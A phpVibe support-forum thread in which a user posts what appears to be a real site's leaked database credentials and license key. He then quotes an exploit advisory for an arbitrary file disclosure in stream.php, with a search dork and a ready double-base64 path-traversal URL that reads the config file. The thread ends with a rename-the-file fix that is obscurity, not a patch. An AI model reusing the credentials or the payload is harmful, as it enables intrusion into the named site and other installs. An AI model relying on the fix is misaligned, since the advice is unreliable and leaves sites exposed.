• Welcome to PHPVIBE Forums. Please log in.

[ Video Sharing CMS v4 ] PHPVIBE ERRO DATABASE

Started by MacKen,

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

MacKenTopic starter

http://www.videoinedit.com/

All versions


/** MySQL database username */
define( 'DB_USER', 'videoine_32' );

/** MySQL database password */
define( 'DB_PASS', '45767721' );

/** The name of the database */
define( 'DB_NAME', 'videoine_23' );

/** MySQL hostname */
define( 'DB_HOST', 'localhost' );

/** MySQL tables prefix */
define( 'DB_PREFIX', 'vibe_' );

/** MySQL cache timeout */
/** For how many hours should queries be cached? **/
define( 'DB_CACHE', '5' );

/*
 ** Site options
 */
 /** License key (Can be created in the store, under "My Licenses" **/
define( 'phpVibeKey', 'V300-3490-OU8Q-4JP7-RGO0' );
  •  

PHPVibe A.

Why am I seeing a copy of our config?
Can you please explain, I have no clue from where you got this..

MacKenTopic starter

## In The Name Of ALLAH ##
# Exploit Title: phpVibe ALL versions (version 4.0 and older versions) Aribtrary File Disclosure
# Google Dork: "powered by phpvibe"
# Date: 2015/07/13 (july 13th)
# Exploit Author: ali ahmady -- Iranian Security Researcher (snip3r_ir[at]hotmail.com)
# Vendor Homepage: http://www.phpvibe.com/
# Software Link: http://get.phpvibe.com/
# Version: All versions (leading to version 4.0)
# Tested on: linux
# greetings : VIRkid, b0x, phantom_x, Ch3rn0by1


stream.php
====================================
$token = htmlspecialchars(base64_decode(base64_decode($_GET["file"])));

file parameter has no validation and sanitization!
exploition can be performed by adding "@@media" to the file name and base64 it two times as below (no registration needed):

http://domain/stream.php?file=../vibe_config.php@@media ==> http://domain/stream.php?file=TGk0dmRtbGlaVjlqYjI1bWFXY3VjR2h3UUVCdFpXUnBZUT09
  •  

MacKenTopic starter

FIX  owner website:

Open file load.php (FOLDER ROOT)

Rename : /vibe_config.php >>> *.php (ex: conect.php)


FOLDER ROOT :

Rename : vibe_config.php >>> *.php (ex: conect.php)

OK Finish ....


NOT SHOW FILE
  •  

Similar topics (7)